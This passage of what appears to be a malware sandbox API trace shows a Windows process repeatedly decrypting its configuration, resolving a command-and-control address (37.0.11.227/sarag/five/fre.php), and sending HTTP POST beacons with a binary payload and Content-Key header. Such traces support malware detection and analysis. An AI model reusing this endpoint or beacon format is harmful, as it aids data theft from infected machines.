0x76b70000 [0243.440] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.442] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0243.442] GetProcessHeap () returned 0x690000 [0243.442] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0243.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.443] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.448] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.454] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.456] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.456] GetProcessHeap () returned 0x690000 [0243.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0243.456] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.456] GetProcessHeap () returned 0x690000 [0243.457] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0243.457] GetProcessHeap () returned 0x690000 [0243.457] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0243.459] GetProcessHeap () returned 0x690000 [0243.460] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0243.460] GetProcessHeap () returned 0x690000 [0243.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0243.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0243.472] GetProcessHeap () returned 0x690000 [0243.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0243.473] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.473] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.474] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.475] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.475] GetProcessHeap () returned 0x690000 [0243.475] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0243.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.476] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0243.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.477] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.478] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0243.478] GetProcessHeap () returned 0x690000 [0243.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.481] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0243.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.482] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0243.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.483] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0243.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.484] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0243.484] GetProcessHeap () returned 0x690000 [0243.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0243.484] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0243.485] GetProcessHeap () returned 0x690000 [0243.485] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0243.485] socket (af=2, type=1, protocol=6) returned 0x680 [0243.485] connect (s=0x680, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0243.563] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0243.572] GetProcessHeap () returned 0x690000 [0243.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0243.572] GetProcessHeap () returned 0x690000 [0243.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0243.573] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.576] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.576] GetProcessHeap () returned 0x690000 [0243.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0243.576] GetProcessHeap () returned 0x690000 [0243.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.577] GetProcessHeap () returned 0x690000 [0243.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0243.577] GetProcessHeap () returned 0x690000 [0243.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0243.577] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.578] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.578] GetProcessHeap () returned 0x690000 [0243.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0243.578] GetProcessHeap () returned 0x690000 [0243.578] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.579] send (s=0x680, buf=0x6ad508*, len=242, flags=0) returned 242 [0243.579] send (s=0x680, buf=0x6aba40*, len=159, flags=0) returned 159 [0243.579] GetProcessHeap () returned 0x690000 [0243.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0243.579] recv (in: s=0x680, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0243.653] GetProcessHeap () returned 0x690000 [0243.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0243.654] GetProcessHeap () returned 0x690000 [0243.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0243.654] GetProcessHeap () returned 0x690000 [0243.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0243.655] GetProcessHeap () returned 0x690000 [0243.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0243.655] closesocket (s=0x680) returned 0 [0243.656] GetProcessHeap () returned 0x690000 [0243.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0243.656] GetProcessHeap () returned 0x690000 [0243.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.656] GetProcessHeap () returned 0x690000 [0243.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.656] GetProcessHeap () returned 0x690000 [0243.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0243.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1384) returned 0x680 [0243.668] Sleep (dwMilliseconds=0xea60) [0243.670] GetProcessHeap () returned 0x690000 [0243.670] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0243.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.671] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.677] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0243.683] GetProcessHeap () returned 0x690000 [0243.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0243.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.684] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.685] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.686] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.686] GetProcessHeap () returned 0x690000 [0243.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0243.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.698] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0243.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.701] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.702] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0243.702] GetProcessHeap () returned 0x690000 [0243.702] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.703] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.704] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.704] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.705] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.705] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.705] GetProcessHeap () returned 0x690000 [0243.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0243.705] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.706] GetProcessHeap () returned 0x690000 [0243.706] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0243.706] GetProcessHeap () returned 0x690000 [0243.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.707] GetProcessHeap () returned 0x690000 [0243.707] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.707] GetProcessHeap () returned 0x690000 [0243.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0243.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.710] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0243.720] GetProcessHeap () returned 0x690000 [0243.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0243.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.721] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0243.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.722] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.723] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.723] GetProcessHeap () returned 0x690000 [0243.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0243.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.724] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0243.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.725] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0243.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.726] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0243.726] GetProcessHeap () returned 0x690000 [0243.726] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.727] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0243.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.728] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0243.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.729] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0243.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.730] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0243.730] GetProcessHeap () returned 0x690000 [0243.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0243.730] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0243.730] GetProcessHeap () returned 0x690000 [0243.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0243.730] socket (af=2, type=1, protocol=6) returned 0x684 [0243.730] connect (s=0x684, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0243.755] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0243.755] GetProcessHeap () returned 0x690000 [0243.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0243.755] GetProcessHeap () returned 0x690000 [0243.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0243.756] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.756] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.756] GetProcessHeap () returned 0x690000 [0243.756] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0243.756] GetProcessHeap () returned 0x690000 [0243.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.757] GetProcessHeap () returned 0x690000 [0243.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0243.757] GetProcessHeap () returned 0x690000 [0243.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0243.758] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0243.758] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.759] GetProcessHeap () returned 0x690000 [0243.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0243.759] GetProcessHeap () returned 0x690000 [0243.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0243.759] send (s=0x684, buf=0x6ad508*, len=242, flags=0) returned 242 [0243.760] send (s=0x684, buf=0x6aba40*, len=159, flags=0) returned 159 [0243.760] GetProcessHeap () returned 0x690000 [0243.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0243.760] recv (in: s=0x684, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0243.838] GetProcessHeap () returned 0x690000 [0243.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0243.839] GetProcessHeap () returned 0x690000 [0243.839] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0243.841] GetProcessHeap () returned 0x690000 [0243.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0243.842] GetProcessHeap () returned 0x690000 [0243.842] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0243.842] closesocket (s=0x684) returned 0 [0243.843] GetProcessHeap () returned 0x690000 [0243.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0243.843] GetProcessHeap () returned 0x690000 [0243.843] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0243.843] GetProcessHeap () returned 0x690000 [0243.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0243.844] GetProcessHeap () returned 0x690000 [0243.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0243.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x410) returned 0x684 [0243.847] Sleep (dwMilliseconds=0xea60) [0243.848] GetProcessHeap () returned 0x690000 [0243.848] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0243.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.851] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.871] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0243.878] GetProcessHeap () returned 0x690000 [0243.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0243.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.881] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0243.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.882] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.883] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.883] GetProcessHeap () returned 0x690000 [0243.883] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0243.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.891] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0243.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.893] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0243.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0243.894] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0243.894] GetProcessHeap () returned 0x690000 [0243.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0243.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.895] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.896] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.897] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.897] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0243.898] StrStrA 